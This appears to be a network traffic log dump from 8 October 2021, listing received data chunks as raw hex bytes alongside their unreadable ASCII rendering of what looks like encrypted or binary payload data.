                    2021-10-08 15:51:51 UTC55INData Raw: 58 99 c5 1f b0 6d 2b ad 88 0d 0c e2 91 a2 2a 2a 45 eb 17 7d 34 42 7b 6d 22 17 12 f1 e0 e0 94 29 c9 29 da d2 da d2 cf 37 a5 d2 9f c4 e9 76 8f 9d d6 c8 c8 a7 a7 d7 6b 47 97 b1 81 7c 99 b5 8d 99 d4 c3 75 5f 46 6e a8 5a be 8e 7f 77 0d 65 54 8f fc 24 6a c4 f3 8e 52 8b b4 76 96 2e 5b 20 7e f4 76 e1 11 6e ab e1 15 78 89 8f bd 0c 90 20 77 64 d1 3c 33 c0 e7 71 3b d3 08 d9 5f 2a 58 99 da d2 cd 33 b2 72 bd 0c c2 98 58 99 d6 c8 c2 98 5b 20 71 55 32 3e 3f dd 3e 5a f0 07 37 ca f9 9c 2c 2f d9 4f 71 55 77 64 cc b0 4d ff d2 bf 73 5a be 8e 75 5f 45 eb 12 f1 fa 1f f9 9c 4b fa 76 e1 27 a3 dd 59 6f 50 f3 8e 6b 47 9e 41 8b 94 09 5b 43 e6 86 08 ab e1 06 d4 ae 68 b5 f9 f2 0c c2 98 57 17 14 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f7 98 5f 2a 46 6e bb 07 30 39 ee 02 a1 c9 5a 9e 28 26 65
                    Data Ascii: Xm+**E}4B{m"))7vkG|u_FnZweT$jRv.[ ~vnx wd<3q;_*X3rX[ qU2>?>Z7,/OqUwdMsZu_EKv'YoPkGA[ChWtA_*Fn09Z(&e
                    2021-10-08 15:51:51 UTC56INData Raw: 8a 7f 77 2d b2 6b 47 87 8a 7e f4 7c f0 61 2f c4 9d da d2 db 54 e1 63 46 6e ee 02 be 8e 75 5f 43 e6 80 f9 ec fd 86 08 be 8e 75 5f 43 e6 9b ba e4 ea 97 b1 83 80 bf 11 76 e1 63 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b 9e 41 8d 99 dd 59 6f 50 e3 67 50 86 28 26 4d ff c7 24 7d 72 bb 07 33 c0 f5 93 c6 a2 38 4c 5c a3 a3 cd 5a 9e 61 2f d8 cd 5c a3 a4 50 f2 0c 92 25 fb a1 aa 5e df 5e e2 e5 70 d3 25 9e 24 1c 7d 72 aa 5e c8 a7 a7 d7 3b d3 34 42 17 7d 52 8b e0 e0 8f 9d d1 3c 76 e1 06 d4 a0 46 0f 69 24 1c 7b 6d 29 a8 2e 34 2c 2f ff ab f6 15 1c 09 3e 5a f2 0c 8b 94 48 73 3c 56 b4 76 8f 9d d0 ba ec fd d2 bf 63 33 a5 d2 cc b0 1e 0d 24 1c 19 81 04 cf 12 f1 a9 dc b9 02 a5 d2 d6 c8 d3 41 92 25 fb a1 aa 5e df 5e c2 98 13 73
                    Data Ascii: w-kG~|a/TcFnu_Cu_Cvc3K n=3KAYoPgP(&M$}r38L\Za/\P%^^p%$}r^;4B}R<vFi${m).4,/>ZHs<Vvc3$A%^^s
                    2021-10-08 15:51:51 UTC57INData Raw: 62 b1 9c 3d bd 0c 90 20 76 e1 07 56 f5 93 87 8a 65 38 2d b2 52 8b fa 1f ff ab 88 0d 11 6e af ea 94 29 c7 24 75 5f 5c a3 ed 80 8a 11 1d 8b f1 89 ec fd c5 1f d1 3c 69 42 16 fa 70 d3 33 c0 e1 63 76 e1 43 e6 9b ba e6 ef e5 6c bb 07 22 17 0e e7 13 73 1b 86 06 d4 ea f8 7e f4 35 c5 3f dd 3c 56 fa 1f f9 9c 51 08 f9 9c 11 6e bd 0c c7 24 34 42 44 69 31 bb 22 17 6d 4c 7c f0 07 56 94 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 4c 7c 85 85 d1 3c 55 12 9f c4 f2 0c af ea fb a1 a7 d7 3e 5a cd 33 c3 1a 76 e1 06 d4 a1 c9 44 69 27 a3 ae 68 a5 d2 fb a1 c1 16 88 0d 00 c5 7d 72 b5 f9 f9 9c 4b fa 70 d3 0f 69 4a 77 16 fa 7a eb 19 81 13 73 2e 34 21 95 e3 67 3a 51 7a eb 1e 0d 07 56 f9 9c 58 99 c1 16 8a 11 0b 60 ff ab e8 f4 64 b6 08 d9 3a 51 6f
                    Data Ascii: b= vVe8-Rn)$u_\<iBp3cvCl"s~5?<VQn$4BDi1"mL|V)ZAl)ZAl)ZAlL|<U>Z3vDi'h}rKpiJwzs.4!g:QzVX`d:Qo
                    2021-10-08 15:51:51 UTC59INData Raw: f8 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 3b d3 40 9a b0 6d 4c 7c f0 07 56 94 29 a8 5a 9f 14 f5 92 e6 57 17 7d 72 d8 cd 33 c0 93 a7 d7 4a d7 4b fb 63 2b ad e6 ee e2 e5 6c c9 29 a8 5b 20 12 f1 89 8f 9d ec c1 36 1e 0d 65 38 4c 7c f0 06 04 cf 37 ca ab e1 62 b1 ef 84 03 4c 7c a3 f1 a9 85 85 85 85 85 85 85 84 c3 1a 04 cf 37 ca aa 5e a7 d7 4b fa 1f c3 26
                    Data Ascii: n=3;@mL|V)ZW}r3JKc+l)[ 6e8L|7bL|7^K&
                    2021-10-08 15:51:51 UTC59INData Raw: 01 11 6e ce b5 f9 9c 3d d9 ff ab e1 63 33 c0 92 25 9e 41 e2 e5 6c 9a 04 ef dd 59 1b 86 08 d9 4f 02 6a c4 9d bf 11 6e cf 37 ca ab e1 63 33 93 9b 9a 61 2f b6 7b 6d 4c 7c f1 19 81 7c f0 07 56 95 ac 63 33 c0 93 a7 84 3f fd ff ab e1 63 33 c0 93 a6 d5 46 6e ce b5 f9 9d bf 11 6e ce b5 f9 cf 0b 40 06 d4 c3 1a 04 cf 37 cb 5e a7 d7 4b fa 1f 91 a2 4b fa 1f 90 20 41 de fb f8 1a 04 cf 37 ca ab e0 80 f9 9c 3d d8 cd 32 3e 5a 9e 41 e2 e5 3f e1 43 bf 11 6e ce b5 79 68 c1 5e 27 a3 cc 4e 01 48 72 e8 74 dc d6 38 4c 7c f0 05 51 08 d9 4f 50 ba a5 8b 94 29 a8 5a 1e 0d 64 ae 68 c0 83 80 79 68 c1 16 fa 1f 9f 3b 53 0d 65 d0 ba 85 8a ef 04 cf 37 1a 04 cf 38 b1 6f 50 86 b0 6d 4c 73 a6 d5 46 6e 6e ce b5 f6 ee 82 fe 28 ae 68 c0 9c c7 24 1b 86 08 d9 4f 03 4c 2f 8a 31 e2 e5 6c c9 29 28
                    Data Ascii: n=c3%AlYOjn7c3a/{mL||Vc3?c3Fnn@7^KK A7=2>ZA?Cnyh^'NHrt8L|QOP)Zdhyh;Se78oPmLsFnn(h$OL/1l)(
                    2021-10-08 15:51:51 UTC60INData Raw: 31 89 d5 74 89 bd 49 c7 11 5c 8a 23 87 b8 92 17 7c c1 e4 db b1 de 00 f4 d4 f2 a4 61 8c 27 3e 6b df 6f c2 a9 51 39 ae 59 41 d3 14 c4 b9 33 de ea e1 53 f1 b9 de eb d3 71 ce 85 16 ca 25 ae 15 48 0b 50 e8 c4 c7 14 a0 76 aa 6e 88 3d e1 53 3e 6a e2 d5 66 8b 87 ba 88 3d d8 cd 33 c1 5e a7 d6 a8 5a 9e 41 dd a3 f2 e1 5c 44 56 4e be 5a a1 0e d8 0c dd ed bf bf 2e 95 93 3c 69 cc 8f 15 47 8e 24 64 89 e4 d5 1d b4 3b ec bd 33 f3 b1 c9 16 e3 58 97 8e 1a 3a bd 32 d6 f6 f1 b7 1e 33 18 c1 c6 9c f1 b7 36 79 ac 5d e5 52 37 f4 a8 64 02 f4 a0 78 4a 49 5d 1b 22 29 08 e7 ed be 16 c4 09 65 a8 64 3a 6f d8 f3 0a e3 e7 4f 7f 49 8d a7 a3 f3 fe 16 96 10 84 3d bc b4 16 c4 c1 28 7e ca ff 95 fc 1a 48 4d b7 c0 d7 75 1f ae 54 b1 d7 75 79 56 80 c7 2d 8f 62 8c e2 d8 27 9e a1 f4 c6 9f 0f 54 cc
                    Data Ascii: 1tI\#|a'>koQ9YA3Sq%HPvn=S>jf=3^ZA\DVNZ.<iG$d;3X:236y]R7dxJI]")ed:oOI=(~HMuTuyV-b'T
                    2021-10-08 15:51:51 UTC61INData Raw: 22 cf 0a 09 66 77 59 a7 ea 40 62 1d b6 f2 31 cf 0a bc b7 a3 f0 4b c7 1e 30 0f 54 a3 f0 2f 8b b0 50 a6 68 dc ea e0 dd 4d c2 88 30 35 f8 12 cc b4 4b fa 23 61 13 87 b6 93 9b 62 8d 51 34 86 34 82 c2 24 20 aa 62 05 6d fc 18 53 31 13 4f a3 f1 09 67 49 c9 59 27 cf 0b 08 e5 08 e5 0c de 87 b6 23 a5 86 34 12 cd 7f 4b b2 4e c5 23 a5 ee 1e 31 bf 2d b2 49 09 60 54 b4 82 c5 ef bf fd 9d 57 2c cb 15 a4 6b fb 9a 94 12 59 20 b6 40 ff 90 bc b1 77 5f be b5 69 79 e4 d1 b8 bb 63 08 8d a2 1b bd 40 64 fe 13 37 f1 c9 12 cd 08 e1 58 ad dd 75 64 ba bf ed ba 7d 48 87 b0 9d 85 69 78 0e dd bd 36 a7 ed 5c 99 61 15 cc 8a b5 c3 ba bf 8d a3 55 28 b2 48 e3 5d a9 e6 67 07 d2 85 f9 a6 09 61 63 09 13 49 b1 d5 06 ee 3e 60 94 13 47 ca 9b 80 d5 7c d4 f9 98 0a 2d 8b 78 df b6 42 80 c0 73 63 ef bd
                    Data Ascii: "fwY@b1K0T/PhM05K#abQ44$ bmS1OgIY'#4KN#1-I`TW,kY @w_iyc@d7Xud}Hix6\aU(H]gacI>`G|-xBsc
                    2021-10-08 15:51:51 UTC63INData Raw: f9 a5 90 19 98 0a d1 04 19 b9 af d2 1f a8 30 01 09 63 07 61 d1 0b fa 28 b4 41 68 f7 1a 33 ba b2 1a 33 9b 8d d6 ff e9 41 d2 88 2e 03 5b 16 0f 5f c6 94 1f a5 d0 8e ee 36 86 3b 74 ee 1a 36 44 58 2a 1b 18 ce ea c9 67 0c c0 a2 4f 33 1a 34 86 38 fa 2f 18 cf af da 40 6f d0 8a 62 81 1b b6 39 ce b5 f8 32 3e 5a 4e 81 42 68 fc 97 8d cf 0b 2e 08 e5 50 a9 e0 c3 21 42 5f 9b 81 d0 81 d8 f6 8c 2d 3d e3 e0 db 2f 8d fd 9d ed bb 4f 38 72 e3 53 36 6d 77 44 52 9d 84 0f 52 89 b5 01 72 36 7d 91 98 ea c2 56 ae ac 59 a2 71 fa 25 3a 6b dd 63 bc b0 e8 ce ca 91 d7 71 3a 6b 22 2d e9 4c 2c 15 3e 60 97 8b a5 e8 d2 85 97 8b 93 9e ba bc 66 82 16 c3 fa 26 fd 9f 10 d5 96 17 b5 c0 57 2e 88 34 fa 26 91 9b 16 c3 be b7 5e 9e d9 76 75 66 37 f3 06 ed 00 fc 58 a0 32 07 26 18 97 88 69 7b 31 82 a6
                    Data Ascii: 0ca(Ah33A.[_6;t6DX*gO348/@ob92>ZNBh.P!B_-=/O8rS6mwDRRr6}VYq%:kcq:k"-L,>`f&W.4&^vuf7X2&i{1
                    2021-10-08 15:51:51 UTC64INData Raw: cd 0a e8 d8 f8 07 63 26 14 fd 92 d5 72 34 76 09 6f b4 42 84 37 16 ce 6d 78 32 0a 0d 51 c0 a7 7f 43 7e c0 07 62 21 a1 45 df d6 fc a0 72 58 ad 9a 0c 9a 0c 92 11 3e 6e f2 38 74 e8 c0 a7 e7 45 c7 10 c4 a9 f8 2e 14 c1 0a e9 62 82 0a ee e2 d6 14 c6 7a d8 19 b2 a2 78 2a 19 49 c6 66 88 cd 00 7d 41 7a d8 4d cc cc 83 f8 29 dc e4 9a 0b 0c d1 54 bc ee 31 db 67 65 0b 58 aa 7a d8 ed b3 e8 c7 3c 65 2c 1c 19 b2 7e c7 2c 1c 0d 57 eb 49 29 9a f4 22 df 6c 0d 57 d7 79 d4 f1 31 89 3b e1 d3 73 f6 27 07 64 32 0c 92 17 11 5c cb 1c 6d 7e 94 1b da e0 b8 b2 26 13 23 ab a9 ee 2a 18 e7 43 f2 3e 4a 45 e7 43 ee 30 3d ea f8 2b 51 39 36 76 11 5f fa 2e 8c 27 17 4c cc 81 d0 8b 3c 67 99 84 a3 fc b8 b1 77 55 82 cf 47 c1 4a 46 36 76 b5 c8 f7 a9 90 11 26 10 a8 6b 07 67 01 79 5c 92 31 8a 11 5e
                    Data Ascii: c&r4voB7mx2QC~b!ErX>n8tE.bzx*If}AzM)T1geXz<e,~,WI)"lWy1;s'd2\m~&#*C>JEC0=+Q96v_.'L<gwUGJF6v&kgy\1^
                    2021-10-08 15:51:51 UTC65INData Raw: 86 30 f0 3f 52 b3 8e 23 fa 27 ee 3a 7e cc a9 e4 e3 50 4c 49 74 e9 03 79 0c d7 07 63 03 79 77 51 0f 5a 34 71 21 a6 71 66 a3 fe 2f 85 85 b7 6a f6 9c 0f 68 f1 27 92 2b 9d 60 9c e5 5c 2b 9d c9 19 a7 d7 4b fa 9f c4 9d 8f 9d 80 0a e2 3b ec f3 b1 e8 cb 2e 0a 0a e0 07 6b 99 88 a3 f0 a6 6f 98 09 f3 b4 ed ba 03 76 94 13 2f 8c 55 28 3d e1 93 9e 86 31 04 f6 ac 5a c6 9b ea c1 52 b2 54 b7 06 ec c8 9f ef bc ae 50 98 0b 78 de cb 16 f0 3f d9 78 1a 33 34 75 d4 f4 95 9b c2 af 98 04 a3 fa 7b 5b d9 79 99 83 6b 71 8e 2d 04 f9 1e 3b 9c 0b 29 9e 02 fc 1f a6 5e 92 c9 1c c5 2a 96 1b 2b 98 bf 24 98 06 ac 56 f4 25 d0 8f d5 73 78 d3 5b 15 6c fd 50 b2 9f f0 d3 75 94 1d 4d cb 91 96 98 07 e6 db fc 10 74 e8 7b 59 57 23 a7 e3 6f 63 e6 dc 1a 37 0b 53 96 1d 0a ee 7a d8 db 67 30 0b 92 17 95
                    Data Ascii: 0?R#':~PLItycywQZ4q!qf/jh'+`\+K;.kov/U(=1ZRTPx?x34u{[ykq-;)^*+$V%sx[lPuMt{YW#oc7Szg0
                    2021-10-08 15:51:51 UTC67INData Raw: c4 ee 67 6f 34 2c 46 28 26 21 95 ac 22 72 bf 70 a0 35 a0 0b 14 94 44 1b e9 30 39 ce b5 f9 cc f3 cf 43 83 c7 24 1c 09 34 24 72 91 f2 4f 77 01 0f 69 42 64 b6 1f d9 2b cc d5 34 2a 7e 80 97 d4 b1 9d ca e8 80 9c 7a eb 7b 6d 4c 3d ac 02 a7 a5 bd 4a 12 85 e4 ae 1c 6c 8e 1b 86 08 98 56 f7 f9 ec ae 0d 00 b7 b8 eb 08 b0 29 dc b2 35 c5 1f 90 44 08 bc f8 72 8c 73 3e 35 86 7c 99 cd 76 95 c9 6e ce b5 f9 9c 7c 83 e5 18 8a 73 33 b2 06 a0 07 33 ac 0a 9b ce d0 fd a6 55 12 f1 c8 c2 f5 f2 42 0c 96 4f 53 61 43 93 e1 17 18 b8 80 f9 9c 3d aa 31 c9 5b 65 4c 0f 08 95 d8 a8 1d 8b 94 29 a8 3f b0 04 9b d6 a9 bf 7e b8 f4 75 18 ff ab e1 63 72 b7 98 5d 6c ac 0f 08 ba ea b4 02 af ad e6 ef 84 03 0d 00 a8 3b 9d da be e7 37 af 86 7d 16 95 e1 17 18 b8 80 f9 9c 3d 99 d0 d6 ac 0d 04 87 ef e8
                    Data Ascii: go4,F(&!"rp5D09C$4$rOwiBd+4*~z{mL=JlV)5Drs>5|vn|s33UBOSaC=1[eL)?~ucr]l;7}=
                    2021-10-08 15:51:51 UTC68INData Raw: 83 f3 eb 18 90 52 db 20 7b 15 3d d8 cd 33 a5 a1 a6 39 8d fd c8 ce f3 8e 1b 86 08 98 56 f8 73 1c 7d 01 3a 38 0a b9 6c a0 00 c5 1f 90 59 69 23 eb 19 e8 b8 e5 09 29 ee 02 ca ab a0 23 f7 f1 c5 7b 03 2d df 33 af a9 a8 3f 9a 38 4c 7c f0 75 30 4b 88 48 07 25 ff e7 05 34 05 51 08 d9 4f 42 0b 06 ba cc d5 2a 4b 99 da 9e 35 a0 01 48 73 5a 9e 00 a0 2b cc fe 4d 93 ce f3 eb 17 08 bd 63 7e 80 9c 7a eb 7b 6d 4c 3d bd 60 c8 c9 48 3b b6 17 08 bd 63 7e 80 9c 7a eb 7b 6d 4c 0f 1a 61 5d 41 86 49 96 41 90 70 a7 b2 35 c5 1f 90 61 40 39 a0 0f 19 f4 64 c4 fc 50 d5 32 5b 67 3d d8 cd 56 f8 7b 0e 88 41 86 69 27 d1 54 db 20 77 23 99 b5 f9 9c 7c 88 48 0a af 8b e6 8d f0 4b 9e 20 7d 3e 5a 9e 41 a3 a3 b4 06 b7 8c 62 c2 f4 10 ec fd a6 14 9b df 32 4c 08 aa 32 3e 5a 9e 33 a1 a1 8a 74 b8 e9
                    Data Ascii: R {=39Vs}:8lYi#)#{-3?8L|u0KH%4QOB*K5HsZ+Mc~z{mL=`H;c~z{mLa]AIAp5a@9dP2[g=V{Ai'T w#|HK }>ZAb2L2>Z3t
                    2021-10-08 15:51:51 UTC69INData Raw: e1 63 33 c0 93 a7 d7 4a e6 27 a3 cc 26 d3 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c8 36 ff ab e0 76 53 0d 65 38 4c 7c f0 07 56 94 29 a8 5a 9e 40 ce 11 6e cf a1 a5 d2 bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 92 b5 09 5b 21 06 80 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33
                    Data Ascii: c3J'&Al)ZAl6vSe8L|V)Z@nn=3[!=3K n=3K n=3K n=3K n=3K n=3K n=3K n=3
                    2021-10-08 15:51:51 UTC71INData Raw: 9b bb 2f b7 ce b4 5e a6 65 39 d6 c9 31 44 96 2f ae 6a f2 0e d1 3e 6c cb 18 fd 90 20 22 15 4e 83 b6 7a f3 8f 85 84 1b 87 92 24 04 ce ad e7 69 43 fe d7 b4 89 70 d3 71 55 22 17 4d ff 9b ba b5 f9 ac 62 a9 dd 49 0a 22 16 ea f9 b4 77 4c 83 7f 76 c9 2b 9b b8 b6 79 5e a5 e4 ea c8 a7 e7 73 6c cb 18 fe 00 c4 b5 f8 32 3f f5 92 0d 64 9e 40 77 65 10 ec fd a6 63 33 f6 15 78 e6 d9 4f 35 c5 29 a8 6c c8 97 4e 7e f5 a3 32 c1 17 5d 24 3c a9 23 98 13 8c e9 89 70 d3 41 1d 74 dc e1 63 05 51 3e 5a a8 5b 00 c4 bd 0d 45 ea d8 cc 90 21 b5 f8 3a 50 a6 55 12 f1 89 8f 9d bf 11 6e fe 28 26 21 a5 d2 8f 9c 25 9f d4 c2 80 f8 0a dc f7 99 95 53 f2 0d 45 eb 4d ff 9d bf 27 a3 fb a1 f9 9c 0d 65 0e e7 47 f1 a9 dd 79 69 62 b0 4d fe 08 d8 ed 81 5c a2 6b c6 02 4b 5a 1f 30 b8 20 53 ad a7 77 9b 45
                    Data Ascii: /^e91D/j>l "Nz$iCpqU"MbI"wLv+y^sl2?d@wec3xO5)lN~2]$<#pAtcQ>Z[E!:PUn(&!%SEM'eGyibM\kKZ0 SwE
                    2021-10-08 15:51:51 UTC72INData Raw: 04 8e 1a 40 5f 6b 46 5a 9e 00 c4 b9 02 8b 95 bc 8a 50 87 8e 1b c7 24 e8 f4 51 08 3d d8 8c 16 2e 34 03 4c b8 80 b8 80 4d ff ea f8 ba 85 c4 9d 2f b6 3a 51 88 0d 24 1c 65 38 0d 65 64 b6 3a 51 44 69 03 4c 40 5f 6b 47 d8 cd 72 d8 d5 46 2f b6 73 a5 2d 4d 00 c5 5f a7 d7 4b fa 1f 90 20 52 06 d5 46 6e ce b5 79 6f 50 d1 3c 56 94 29 88 54 91 63 33 c0 93 a7 d7 0b 14 01 48 73 5a 9e 41 a2 3f 9d bf 11 6e ce b5 b9 6f 7c f0 07 56 94 29 e8 87 0e e7 71 55 12 f1 c9 5a b6 7b 6d 4c 7c f0 47 83 a8 5a 9e 41 e2 e5 2c 5c 8b 94 29 a8 5a 9e 01 3b fb a1 c9 29 a8 5a de a8 72 d8 cd 33 c0 93 e7 02 e2 e5 6c c9 29 a8 1a 76 95 ac 63 33 c0 93 e7 03 9c 3d d8 cd 33 c0 d3 33 dc d7 4b fa 1f 90 60 dd e5 6c c9 29 a8 5a de aa 5a 9e 41 e2 e5 6c 89 ff fb a1 c9 29 a8 5a de b4 8e 1b 86 08 d9 4f 43 89
                    Data Ascii: @_kFZP$Q=.4LM/:Q$e8ed:QDiL@_kGrF/s-M_K RFnyoP<V)Tc3HsZA?no|V)qUZ{mL|GZA,\)Z;)Zr3l)vc3=33K`l)ZZAl)ZOC
                    2021-10-08 15:51:51 UTC73INData Raw: 7e 98 56 f0 27 c4 f8 68 e0 8e 72 b5 d6 e8 80 8b f5 e7 02 ca ab e1 50 79 97 4e 7e f4 10 ec fd a6 55 66 da b0 43 a9 97 e4 b6 18 96 42 06 a1 99 e9 05 23 fc 57 42 38 76 a2 6b 29 c1 7b 42 44 1d f9 fd d2 cc b0 6d 4c 5e 58 66 44 96 2e 34 42 10 8d fb 8f e9 05 30 4b ae 34 21 fc 48 11 1b d6 94 5a ec 98 40 0a 81 46 2d b2 06 b5 9b 94 66 f0 52 d7 28 4f 6f 32 4b aa 02 b9 70 b6 08 8c 4a 4d bc 8a 11 6e ba e4 88 23 d6 8b d1 78 ad ba e6 86 64 d4 b6 2b f1 fa 6d 29 db 01 14 cf 74 dc d7 4b fa 6b 34 27 cd 6f 33 a9 b0 0f 1c 59 47 83 f2 69 31 ee 5e 9d fc 24 2e 09 23 fc 40 31 f2 62 de b8 c9 29 a8 5a 95 53 f2 f3 71 55 12 f1 ab e1 63 33 c1 e9 89 70 2c 2f b6 59 21 f0 6b 2e 52 b6 37 98 66 bb 07 56 9e be 71 aa a1 c9 29 f5 e7 04 ac 17 0f 06 bc d9 3b b6 15 0a b8 f4 7e bd 57 17 7d 72 ca
                    Data Ascii: ~V'hrPyN~UfCB#WB8vk){BDmL^XfD.4B0K4!HZ@F-fR(Oo2KpJMn#xd+m)tKk4'o3YGi1^$.#@1b)ZSqUc3p,/Y!k.R7fVq);~W}r
                    2021-10-08 15:51:51 UTC75INData Raw: 2b 53 e9 7c 18 ff ea 91 ae d2 bf 50 0c 82 5f 49 80 06 2a ce ae 80 f9 dd 30 35 7f 77 25 14 7d d3 be 70 33 b2 9a 38 0d ef 24 09 d0 ba c4 17 cd 8b 6b b9 ca 65 d0 af 01 b7 00 25 17 95 ac 22 9d 1f 85 0e e7 30 b3 44 d1 2e 40 9f 40 a0 b9 1b 0f 81 7c b1 65 98 92 da 2c cd 78 0e e7 30 b3 54 37 1a 8f 62 4f e6 f0 ef 84 42 1d 87 0f 6d c7 db ab 86 67 d5 46 6e ce b4 ce b5 f9 9c 38 f6 ea 06 1d 91 4a 88 f3 6e 1d 63 33 81 f6 6d f4 ef 7b 92 7d e7 fa e0 1f 69 41 0a 22 e8 0b 38 d9 c2 67 c2 67 69 c7 af 15 87 78 3e b2 72 99 3f ad 47 0f 96 d1 68 55 9f 3b 2d 53 09 b3 f4 51 82 8e a3 32 c1 e9 2a bf 9a c7 db ac f7 70 d3 00 4f 6b e6 10 13 8c 4a fa 92 f5 18 00 3a 47 96 c6 a2 0a 57 83 21 6a 3a b0 5d cd 33 81 f6 7d ca 54 70 2c 4f 96 a5 2d 4d 0d 55 fa 1f d1 b6 17 dc d7 0a 57 6b 52 00 3a
                    Data Ascii: +S|P_I*05w%}p38$ke%"0D.@@|e,x0T7bOBmgFn8Jnc3m{}iA"8ggix>r?GhU;-SQ2*pOkJ:GW!j:]3}Tp,O-MUWkR:
                    2021-10-08 15:51:51 UTC76INData Raw: 5c 46 c4 75 5b 72 53 0d 24 96 aa 4b 71 55 53 87 0a 65 c7 da 24 39 26 21 d4 97 29 a5 59 1b c7 ae ec 45 53 58 12 0e 18 07 4a 9f c4 dc 5d bd ad 5e ea 75 eb 2e bf ee fc cc a4 b8 80 b8 f9 b8 95 27 17 38 c1 e9 88 e8 1a ec fd e7 fb 39 76 5d 70 58 66 44 97 aa b6 7b 2c a5 7a 4a cb 7b e0 1f 6e 28 2e dc d7 0a 57 bf a9 1c 5c 28 d9 b0 97 80 11 6e 8f f5 4f bb c7 71 d8 32 c0 70 71 bd 0c a3 93 7b d5 66 32 5a ae 97 d5 46 2f de 14 9d ea 38 7f 88 f2 09 ed 68 c0 d2 e1 57 af b9 fb d4 8a 11 04 cf 5d 25 9e 41 d8 74 30 b2 27 a3 8c 43 2a 2a 6b 3e 7e f4 51 5e bb 07 17 04 e7 71 55 12 f3 8e 5a c3 de db 54 8f 9d bf 50 d2 df 5e e6 bb 97 b1 ae 56 28 26 60 92 c9 29 e9 30 01 48 32 78 8e 1b c7 18 83 80 b8 bd 20 12 b0 65 64 b6 3a 59 b7 fe 69 45 13 73 1b 8e 33 c0 d2 b9 76 e1 22 11 82 fe 68
                    Data Ascii: \Fu[rS$KqUSe$9&!)YESXJ]^u.'89v]pXfD{,zJ{n(.W\(nOq2pq{f2ZF/8hW]%At0'C**k>~Q^qUZTP^V(&`)0H2x ed:YiEs3v"h
                    2021-10-08 15:51:51 UTC77INData Raw: d8 0a dd 59 1b c2 24 59 dc 28 d8 15 55 fa 1f 90 20 56 2e fd 95 10 a9 51 f7 66 56 f0 ef 84 03 4c 83 39 31 44 97 1d 0e 6a 3b 2c d1 94 bc 01 b7 00 2b f3 66 bb 07 56 90 9a c7 db aa f6 90 ad 19 7e 0a 7d c7 db ab 1f 7d 2a c2 4e 0a 22 e8 0a 7d f7 15 78 a7 8c 02 a2 b4 89 71 f1 3c a9 23 67 d0 ca 43 35 4e 7e 0b 9e e5 e9 fb a1 88 56 9c 55 32 b7 9a 08 26 45 eb 3a 0b 90 48 26 e1 50 5e 2c dd d2 46 e5 93 58 67 9d 22 9e be 71 ab 45 76 68 3f 22 e9 de 46 e7 8e e4 14 6d d1 b5 06 2b 53 99 28 af 15 87 74 40 c2 11 b5 ca fc 72 8b 6b b8 7e 60 68 41 0e 6c 9c fd 2d 71 0e b9 58 c0 6c 37 26 7a 03 68 d4 48 77 40 13 f8 dc 5c 87 8e 92 da 2d 4d 57 ff 68 4b fe 0c b6 f6 cd b8 72 53 f5 57 94 7f 24 1c 49 78 25 c5 41 b8 a4 54 04 eb 7f fe d7 b4 7b e8 1c 5a 46 e5 93 58 94 ac 8b c4 9d fe ae 08
                    Data Ascii: Y$Y(U V.QfVL91Dj;,+fV~}}*N"}xq<#gC5N~VU2&E:H&P^,FXg"qEvh?"Fm+S(t@rk~`hAl-qXl7&zhHw@\-MWhKrSW$Ix%AT{ZFX
                    2021-10-08 15:51:51 UTC79INData Raw: b2 00 b0 2e 68 b3 83 ef e0 8e 72 8f c1 62 d7 24 6f 3f af 89 e6 a2 17 38 1e 4c 2b f9 da 9d ec fd a6 55 3f 22 e8 0b 9f 04 44 1a 60 cd 56 e6 87 de ae 60 ac 23 89 8f 9d bf 11 26 21 d5 56 94 29 a8 5a 9a 41 83 f2 7e 95 ff ff ac 72 d8 8c 42 f8 d9 4e 81 3d 51 08 f4 93 67 b6 b8 dd a1 22 e8 0a 34 80 10 2f b6 3a 05 dd 31 ab 68 a4 09 02 90 e0 d3 41 a3 44 69 47 0f 49 7c 94 19 7e 90 20 53 59 9e 29 fd 66 88 e1 e8 a1 c9 2d 70 8e fe a3 96 70 8c fc cf c8 59 f2 fb 48 b0 92 db ae f1 61 2f f7 de 7b 78 6d ac 26 ac 63 72 8c 41 8a 01 c1 72 81 25 c4 5d 16 05 af 17 65 d0 ba c4 db f4 1d 00 25 cb a3 c5 5a 15 a8 2f f9 df a1 36 54 ae 80 a9 28 63 30 35 35 81 f7 4c 39 45 bb 0f 99 f1 02 1e 48 f8 4a 88 f2 f8 08 31 9f 34 06 5f fe 6d c7 bf 25 13 23 51 4d 72 03 7f 30 0a a1 36 c2 d7 4d 87 3d
                    Data Ascii: .hrb$o?8L+U?"D`V`#&!V)ZA~rBN=Qg"4/:1hADiGI|~ SY)f-ppYHa/{xm&crAr%]e%Z/6T(c055L9EHJ14_m%#QMr06M=
